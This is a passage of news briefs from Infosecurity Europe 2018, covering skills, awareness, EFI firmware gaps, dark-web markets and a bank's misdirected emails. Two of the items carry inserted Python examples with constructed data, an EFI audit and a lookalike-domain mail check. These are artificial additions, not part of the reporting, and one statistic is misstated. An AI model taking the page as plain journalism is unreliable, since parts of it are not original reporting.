He concluded by saying that the real value of AI is in replicating human tasks, but what you get out is to reduce the workload of the human. “We need to realize that machines are not going to replace humans, and in most instances they increase the human‘s work,” he said.
“But in security machines and humans are inherently different: machines are good at memorizing data and repetitive tasks and do it fast in multiple tasks, and humans are good at being creative and looking at context. It is not man or machine, but a combination of machines doing tedious work so humans can focus on creative work.”
Internet stakeholders should worry less about the problems created by Silicon Valley and focus more on the increasingly dystopic online world being developed in Russia, China, Iran and elsewhere, according to Baroness Martha Lane Fox.
The Lastminute.com founder and cross-bench peer told attendees on day two of Infosecurity Europe of her concerns about Russian attempts to destabilize Western democracies and China’s controversial social credit system.
The latter seeks to give citizens points according to their behavior on- and offline, and restrict their lifestyles if scores fall below a certain level.
“We’ve become a bit obsessed with the West [when] we should be looking East,” she argued.
“We could easily put ourselves into a dystopian future in our heads … but we have it in our gift to own the future.”
To ensure the UK does so, work is needed to effect change at three levels: among lawmakers, individuals and corporations, Lane Fox claimed.
There is a particular challenge in changing the mindset of legislators from the current stance: “that no politician is going to lose votes by being negative about technology.”
“We need to upskill our legislators dramatically if we’re going to face the challenges of the coming years,” said Lane Fox.
However, politicians and civil servants were upskilled in this way during the creation of the Government Digital Service and gov.uk initiative, so it is possible, she added.
It will also be challenging to educate individuals about all things digital. Although 50% of respondents to a recent poll conducted by her new company Doteveryone claimed tech has helped them at an individual level, just 12% believe it helps society overall.
Key to the UK’s resilience in a post-Brexit world will be its ability not just to grow the digital economy, but to “flip the switch” and build a society enabled by technology – driving improvements in schools, transport, local government and more.
“We don’t have any option [post-Brexit] but to become the most modern digital nation we can be,” said Lane Fox.
However, in order to do so, the UK will have to tackle a profound technical skills deficit, she added.
Speaking in the keynote session 'Rethinking Security Teams to Address the Skills Shortage & Secure the Business' at Infosecurity Europe 2018, panelists were united in agreement about having a blend of talent and diversity to build the best team.
Cory Scott, CISO of LinkedIn, said that if you only employ “tricksters” nothing will get fixed, and that is why you need to look for all types, “and why diversity and narrative should be in your mindset; if they all look like you and all have the same background and education you end up with a homogenous group of individuals who are not serving the business.”
Scott added that you want a collection of people with different narratives and different types of functions, but that “trickster” narrative was also important to understand how the next attack pivots, and you want an engineering wizard to solve problems at scale and not just do a manual review time and time again.
Christian Toon, CISO of Pinsent Masons, likened the building of a security team to Marvel’s Avengers where there are participants with different skills and backgrounds. He said: “There is not a skills gap, there is an attitude gap and that is why you hire.”
In terms of internal development, Toon encouraged delegates to consider “giving people a career, a job and then give them something else” like training and education opportunities.
“People want to grow and develop, so give them training and meaningful qualifications that enhance your security team, and treat them as individuals,” he said. “Look at every walk of life, every gender, and you need to tell HR to positively discriminate.”
A question from moderator Wesley Simpson, chief operating officer, (ISC)2, pointed out that women only make up 8% of most security teams, and only 7% are women under 29, so what is being done to cast the net wider?
Toon recommended looking at incentivizing those looking for a career change and encouraging those only able to take on part-time roles, while Scott said that there are three areas to consider:
- an inclusive and supportive culture, where you listen to your employees and understand how to measure culture;
- hiring and getting the right type of candidates, and the “unconscious bias” in organizations who don’t understand your message;
- establishing ability with a wide group and focusing on the development of the organization.
Closing with a discussion on the role of recruitment agents, Toon said that he finds “recruiters difficult to deal with, and the right ones are worth their weight in gold.”
Mun Valiji, CISO of Sainsbury's, said that there is too much time spent trying to get “a CV match” and not enough spent on getting the recruitment agent to understand requirements that the company is trying to fulfill and understand the business and engagements.
Emma Smith, group technology security director at Vodafone, argued that the more the recruitment company knows about the business the better the match. “We make sure every role goes through the gender language tool” and that recruiters can help with that, and make sure that the recruitment process is a personal task.
The European Security Blogger Award winners have been announced.
Following on from the last awards, held in 2016, the shortlist saw some of the leading names in cybersecurity commended.
Nominated and voted for by the public, with votes added by judges including Infosecurity Europe Hall of Fame members Jack Daniel and Brian Honan, security blogger and AlienVault advocate Javvad Malik, Infosecurity Magazine contributing editor Dan Raywood and Yvonne Eskenzi from Eskenzi PR, the awards were presented at the Blogger Awards meet-up in a reception held in London.
The winners were announced as the following:
- Best Corporate Security Blog = ESET We Live Security
- Best European Corporate Security Blog = Digital Shadows
- Best European Security Podcast = Jenny Radcliffe, The Human Factor
- Best Security Podcast = Smashing Security - Graham Cluley
- Best Security Video Blog = Sophos Security
- Best European Personal Security Blog = Leigh Anne Galloway
- Most Entertaining Blog = Javvad Malik
- Most Educational Blog = Scott Helme
- Best New Security Blog = Hacker Not Found
- Best EU Security Tweeter = Kevin Beaumont
- Grand Prix Prize for the Best Overall Security Blog = Troy Hunt
The first step is assessing “what your organization looks like on paper, and knowing about your organization in terms of the sector, the size, the geography – what are the most important information assets, which are the biggest threats and what would be the most damaging thing that could happen to the organization.”
Once you have that understanding of the baseline characteristics of the organization on paper, you can move onto “understanding them in real life,” Dr Barker said, and the key thing that must be done here is speaking to people within the organization “to find out what is actually happening, because as we know, what is happening day-to-day among the employees of an organization will be a very different picture to what you see on paper.”
Dr Barker added that a good level of security awareness does not always equate to good security understanding and changes in behavior, “so when we talk about awareness we need to think about what the outcome is that we want – we don’t want people to be aware just for the sake of it, we want to see changed behaviors.”
Her advice for doing that is to “work backwards” to create a culture in which people are engaged through experiences of what good security behavior is, and making “cybersecurity personal is one of the best ways to get through to people.”
“If you really want to change behaviors,” she concluded, “you need to think about intrinsic motivation and what you can do that is really going to tap into their [users’] internal rewards system.”
Speaking at Infosecurity Europe 2018, Bruce Hallas, founder of The Analogies Project, discussed user behavior, highlighting a common assumption about the subject and explaining why it is flawed logic that should be reconsidered.
That assumption is that people are logical thinkers, and process information rationally and make decisions which appear to be sensible. In fact, Hallas explained, users are irrational and make many behavioral decisions which are affected by cognitive biases, and that must be taken into account when you are trying to influence better security behaviors and design security awareness training.
“The bad news is that people are people and they aren’t that logical at the end of the day,” he added. Once that is accepted, he argued, the conclusion is that people are predictably irrational, thanks to more than 150 identified cognitive biases.
Examples of the cognitive biases Hallas pointed to include: loss aversion, whereby “we feel more what we lose than what we gain,” status quo bias which suggests users “don’t like change” unless it is their idea, social influences and the “IKEA effect” where “we tend to value things we have developed more than other people.”
“Research has shown that you can make really, really small tweaks to what you are already doing” to see effective behavioral returns, Hallas concluded, but to do that “you’ve got to get to grips with cognitive biases.”
When it comes to cybersecurity practices of consumers, a new report shows that Florida ranks as the riskiest state with most residents lagging behind in their awareness of online safety practices.
The Cyber Hygiene Index: Measuring the Riskiest States, conducted by Ponemon Institute and commissioned by Webroot, surveyed more than 4,000 consumers across all 50 states and Washington, D.C., and found that New Hampshire scored the highest. In contrast, Florida came in dead last, reflecting that most residents are not ready to prevent, detect or respond to cyber-related attacks such as malware, phishing, ransomware and identity/credential theft.
Wyoming and Montana were just above Florida, an indication that despite high profile breaches such as Equifax, individuals across the US lack cybersecurity education. The spectrum is wide, though, and at the other end, individuals residing in New Hampshire, Massachusetts and Utah have the safest online habits.
Only 24% of Americans are aware of the best practices that will increase online security, such as regularly monitoring bank and credit card statements and understanding how to block pop-ups, updating online account passwords, and taking precautions before clicking on an email. Additionally, only half of Americans use antivirus or other internet security software on their laptops, desktops or smartphones.
Nearly two-thirds (72%) of survey respondents living in Florida reported that they share passwords or other access credentials with others, while more than half (53%) of New Hampshire residents claimed that they never share passwords with others.
Interestingly, the number of devices an individual owns is a greater indicator of their cyber-risk than is their age. The survey results found that the more devices an individual owns, the lower their level of cyber-hygiene. In fact, 75% of respondents 30 and under reportedly engage in riskier online behaviors than older respondents.
“Regardless of the region, the riskiest states index shows that many people in the US are jeopardizing their safety with inadequate cybersecurity practices. To help fight widespread threats like ransomware and phishing attacks, internet users should run a security solution on their personal devices and make sure that all security and other software applications are up to date,” said David Dufour, vice president of engineering and cybersecurity, Webroot.
Security experts have warned that Extensible Firmware Interface (EFI) updates often lack transparency, and fail to cover all hardware models and software versions, leading to dangerous gaps in protection.
Duo Labs director, Rich Smith, told attendees at Infosecurity Europe today that securing the EFI layer is particularly important as its position in a computing system means compromise could give hackers the upper hand in terms of stealth, persistence and access to anything above it.
Although efforts to compromise EFI are most often carried out as part of highly targeted attacks, they remain a major threat to organizations, he warned.
Smith revealed newly updated research from Duo Security which details shortcomings in Apple’s EFI update processes.
Drawing on data collected from 73,000 customer machines, the findings show that 4.2% were running the wrong EFI version – much higher than the 1% or so expected.
That rose to nearly 43% for the oldest Mac model on the market, dating back to 2015.
The results also showed that organizations could be “software secure but firmware vulnerable.”
For the latest Mac update, 10.12.6, the researchers found 43 EFI bundles issued. This figure dropped to 31 for Mac version 10.11 and just one for the previous version, 10.10.
“This makes it difficult for administrators to do good rigorous analysis across their fleets. It’s difficult to understand your threat profile and attack surface,” Smith claimed.
“The only way to ensure you’re getting the best firmware updates is ensuring you’re on the latest software version.”
He called on tech firms to introduce “the same degree” of transparency into the firmware update process as they do with software updates.
Duo Security chose to study Apple because the firm’s singular ecosystem made it easier to analyze, but Smith warned that failings in the Wintel space are arguably even more acute.
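The fleet-level check Smith describes (finding hosts that are on a current OS but not on the EFI bundle that shipped for it, and hosts whose model/OS combination has no bundle at all) can be scripted against an asset export. The following is an added example, not Duo Security's research tooling; it assumes a constructed CSV inventory and a constructed table of expected bundles, and every version string in it is a made-up placeholder rather than a real Apple firmware version.

```python
import csv
from collections import Counter
from dataclasses import dataclass
from io import StringIO


@dataclass(frozen=True)
class Machine:
    hostname: str
    model: str
    os_version: str
    efi_version: str


# Expected EFI bundle per (model, macOS version). Constructed placeholder
# values for illustration only; they are not real Apple firmware versions.
# In practice this table is built from the bundles shipped with each update.
EXPECTED_EFI = {
    ("MacBookPro11,4", "10.12.6"): "MBP114.0184.B00",
    ("iMac17,1", "10.12.6"): "IM171.0110.B00",
    ("iMac17,1", "10.11.6"): "IM171.0105.B08",
    # Deliberately no entry for MacBookAir7,2 on 10.10.5: a coverage gap.
}

# Constructed inventory export, the kind of CSV an MDM or asset tool produces.
# Model identifiers contain a comma, so they are quoted.
SAMPLE_INVENTORY_CSV = """hostname,model,os_version,efi_version
host-a,"MacBookPro11,4",10.12.6,MBP114.0184.B00
host-b,"MacBookPro11,4",10.12.6,MBP114.0172.B00
host-c,"iMac17,1",10.11.6,IM171.0105.B08
host-d,"MacBookAir7,2",10.10.5,MBA72.0166.B00
host-e,"iMac17,1",10.12.6,IM171.0105.B08
"""


def parse_inventory(csv_text: str) -> list:
    """Parse the inventory CSV into Machine records."""
    reader = csv.DictReader(StringIO(csv_text))
    return [
        Machine(r["hostname"], r["model"], r["os_version"], r["efi_version"])
        for r in reader
    ]


def audit_machine(machine: Machine, expected=EXPECTED_EFI) -> str:
    """Classify one host as 'ok', 'firmware-mismatch' or 'no-bundle'."""
    bundle = expected.get((machine.model, machine.os_version))
    if bundle is None:
        # No EFI bundle is known for this model/OS pair: the vendor's update
        # did not cover it, so there is nothing to be "current" against.
        return "no-bundle"
    if machine.efi_version == bundle:
        return "ok"
    # The OS is current but the firmware is not the bundle shipped for it:
    # "software secure but firmware vulnerable".
    return "firmware-mismatch"


def audit_fleet(inventory, expected=EXPECTED_EFI) -> dict:
    """Summarise the fleet: counts, mismatch percentage and per-host status."""
    per_host = {m.hostname: audit_machine(m, expected) for m in inventory}
    counts = Counter(per_host.values())
    total = len(per_host)
    return {
        "total": total,
        "ok": counts["ok"],
        "firmware_mismatch": counts["firmware-mismatch"],
        "no_bundle": counts["no-bundle"],
        "mismatch_pct": round(100.0 * counts["firmware-mismatch"] / total, 1) if total else 0.0,
        "per_host": per_host,
    }


if __name__ == "__main__":
    report = audit_fleet(parse_inventory(SAMPLE_INVENTORY_CSV))
    print(f"{report['firmware_mismatch']}/{report['total']} hosts on the wrong EFI "
          f"({report['mismatch_pct']}%), {report['no_bundle']} with no bundle")
    for host, status in sorted(report["per_host"].items()):
        print(f"  {host}: {status}")
```

The "no-bundle" bucket is the one that matters for Smith's transparency point: a host there is not fixable by patching the OS, and only a published per-model bundle list lets an administrator tell a coverage gap from a stale install.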
Though somewhat deterred by the major takedown of two popular underground marketplaces, cybercriminals have found alternative solutions that are growing more popular, according to new research from Digital Shadows.
A new report, Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age, found that the cybercriminal community has only been slightly quieted by the Operation Bayonet takedown of AlphaBay and Hansa, which forced tens of thousands of vendors and buyers to find new places to conduct business. Mistrust and fear have contributed to the decline of centralized marketplaces, as has the significant cost factor involved in establishing a new market.
Rather than investing in new marketplaces, criminals are focusing their processes and procedures on improving marketplace security and trust in existing sites. These tactics include blockchain DNS, user vetting and site access restrictions, domain concealment, and migration to chat and peer-to-peer (P2P) networks.
Vetting and limiting the user base is an additional challenge for site operators, who need to ensure only reputable and genuine users have access, particularly since forum users are skeptical of each other, aware that law enforcement can be posing as sellers.
To confront the issues of trust, communities have created a forum life cycle, a process by which administrators can limit new users’ access to a forum through mechanisms such as posting limits and area access restrictions.
Moving away from the centralized marketplace in favor of a more diffuse model was trending even before Operation Bayonet, and criminals are now using Telegram to conduct transactions across decentralized markets and messaging networks.
"Over the last six months, the Digital Shadows analyst teams have detected over 5,000 Telegram links shared across criminal forums and dark web sites, of which 1,667 were invite links to new groups," the report said. These covered a range of services, including cashing out, carding and cryptocurrency fraud.
Rick Holland, CISO and VP of strategy at Digital Shadows, said, “The FBI takedown has for now made the dark web marketplace model less viable. As it stands, the marketplace model appears to be in decline, but it would be naive to assume that law enforcement efforts such as Operation Bayonet have drastically reduced cybercriminal risks to both businesses and consumers."
"Instead," he continued, "as recent developments have shown, cybercriminals have taken to incorporating new processes, technologies and communication methods to continue their operations. The barriers to entry have shifted upwards and criminals are more likely to be deceived by each other. However, cybercrime ‘will find a way.’”
Despite the awareness that they are duty-bound to protect the sensitive information of their customers, banks continue to suffer data breaches as the result of human error, as was the case for the Commonwealth Bank of Australia (CBA). The Sydney Morning Herald reported that CBA breached the privacy of 10,000 customers by sending their data to the wrong email addresses.
After conducting an information security investigation, the bank learned that 651 internal emails were incorrectly sent to email addresses at the wrong domain from 2016 to 2017. The sender inadvertently omitted the ".au" on the end of the intended domain, cba.com.au.
In order to prevent these human errors, CBA purchased the cba.com domain name in April 2017; however, the investigation looked into events that occurred before the takeover, when the domain was used by a US cybersecurity firm.
CBA revealed that the 651 emails were indeed sent during that time frame and contained the data of 10,000 customers. "An extensive and detailed investigation by CBA confirmed the contents of all 651 internal emails were automatically deleted by the cba.com domain owner's system, which only collected information on CBA sender and recipient email addresses and the subject of the email," the bank wrote in a 1 June 2018 statement.
The bank's investigation confirmed that no customer data was compromised as a result of the mistake, but it accepted responsibility and acknowledged that customers want to be informed about data security and privacy issues. To that end, the bank has started to notify affected customers.
In the aftermath of the EU's GDPR compliance deadline, this type of privacy breach will continue to get more scrutiny, especially as today's large banks and enterprises serve global clientele. The moral of the story, said Anthony James, CMO at CipherCloud, is that customer data must be carefully protected.
"Note that if the breach involved even the records of one European customer, then they would have also likely been subject to the 72-hour notification requirement and the extremely onerous provisions of the EU General Data Protection Regulation," James said. "New best practices require a deeper focus on data and threat protection, especially in support of challenging new compliance requirements.”
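A mail-gateway rule that holds messages addressed to a truncation or one-character typo of the organization's own domain would have flagged the 651 emails before they left. The code below is an added example, not CBA's control or any product's implementation; it assumes a configured set of internal domains (cba.com.au is the domain named in the article, the addresses are constructed) and a near-miss threshold of one edit, both of which are choices rather than facts from the page.

```python
# Internal domains the rule protects. cba.com.au is from the article; treating
# it as the only internal domain is an assumption for this example.
INTERNAL_DOMAINS = {"cba.com.au"}

# Constructed sample message: one correct internal recipient, one truncated
# domain (the article's case), one genuine external recipient, one typo.
SAMPLE_SENDER = "ops-team@cba.com.au"
SAMPLE_RECIPIENTS = [
    "alice@cba.com.au",
    "bob@cba.com",
    "carol@example.org",
    "dan@cba.con.au",
]


def recipient_domain(address: str) -> str:
    """Return the normalised domain part of an email address."""
    return address.rsplit("@", 1)[-1].strip().lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def classify_domain(domain: str, internal=INTERNAL_DOMAINS) -> str:
    """
    'internal' for an exact internal domain, 'truncated-internal:<d>' when
    the recipient domain is a leading part of an internal domain (cba.com vs
    cba.com.au), 'near-miss-internal:<d>' for a one-edit typo, else 'external'.
    """
    if domain in internal:
        return "internal"
    for good in sorted(internal):
        if good.startswith(domain + "."):
            return f"truncated-internal:{good}"
        if levenshtein(domain, good) <= 1:
            return f"near-miss-internal:{good}"
    return "external"


def check_outbound(sender: str, recipients, internal=INTERNAL_DOMAINS) -> list:
    """
    Return (recipient, reason) pairs that should be held for review. Only
    mail originating from an internal domain is subject to the rule; external
    senders relaying through the gateway are left alone.
    """
    if recipient_domain(sender) not in internal:
        return []
    held = []
    for rcpt in recipients:
        verdict = classify_domain(recipient_domain(rcpt), internal)
        if verdict.startswith(("truncated-internal", "near-miss-internal")):
            held.append((rcpt, verdict))
    return held


if __name__ == "__main__":
    for rcpt, why in check_outbound(SAMPLE_SENDER, SAMPLE_RECIPIENTS):
        print(f"HOLD {rcpt}: {why}")
```

Holding rather than blocking matters in practice: an organisation may legitimately correspond with a domain one edit away from its own, so the rule should route the message to a reviewer, log the decision and tell the sender why, rather than silently drop it. Registering the lookalike domain, as CBA did, closes the specific gap but not the class of error, which is why a recipient-side check is still worth having.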